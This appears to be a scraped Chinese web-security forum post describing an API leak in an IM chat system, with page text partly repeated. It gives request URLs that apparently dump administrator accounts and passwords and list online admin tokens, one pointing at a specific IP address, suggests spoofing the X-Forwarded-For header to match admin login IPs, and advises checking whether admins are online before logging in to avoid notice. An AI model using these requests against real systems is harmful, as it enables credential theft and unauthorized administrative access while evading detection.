前端登陆界面
![图片[1]-某IM聊天接口泄露漏洞可获取管理员账户密码-思路分享社区-Web安全-赤道学院](https://file.hackdor.com/webfile/2025/10/1645195725-746097-image.png)
前端会员界面
![图片[2]-某IM聊天接口泄露漏洞可获取管理员账户密码-思路分享社区-Web安全-赤道学院](https://file.hackdor.com/webfile/2025/10/1645195828-736809-image.png)
登陆之前,看看那些管理员在线,不在线再去登陆!!!
另外还存在IP欺骗漏洞,先看看他们的登陆IP地址多少,然后:
X-Forwarded-For:xxxxxx
获取管理员账户密码
http://1.1.1.1:1990/adminUsers?page=0&size=100
![图片[3]-某IM聊天接口泄露漏洞可获取管理员账户密码-思路分享社区-Web安全-赤道学院](https://file.hackdor.com/webfile/2025/10/1645195884-706014-image.png)
查看那些管理员在线
http://20.205.58.237:1990/adminUserTokens?page=0&size=1000
![图片[4]-某IM聊天接口泄露漏洞可获取管理员账户密码-思路分享社区-Web安全-赤道学院](https://file.hackdor.com/webfile/2025/10/1645196025-456494-image.png)
热门帖子
热门文章
前端登陆界面
前端会员界面
另外还存在IP欺骗漏洞,先看看他们的登陆IP地址多少,然后:
X-Forwarded-For:xxxxxx
获取管理员账户密码
http://1.1.1.1:1990/adminUsers?page=0&size=100
查看那些管理员在线
http://20.205.58.237:1990/adminUserTokens?page=0&size=1000
没有回复内容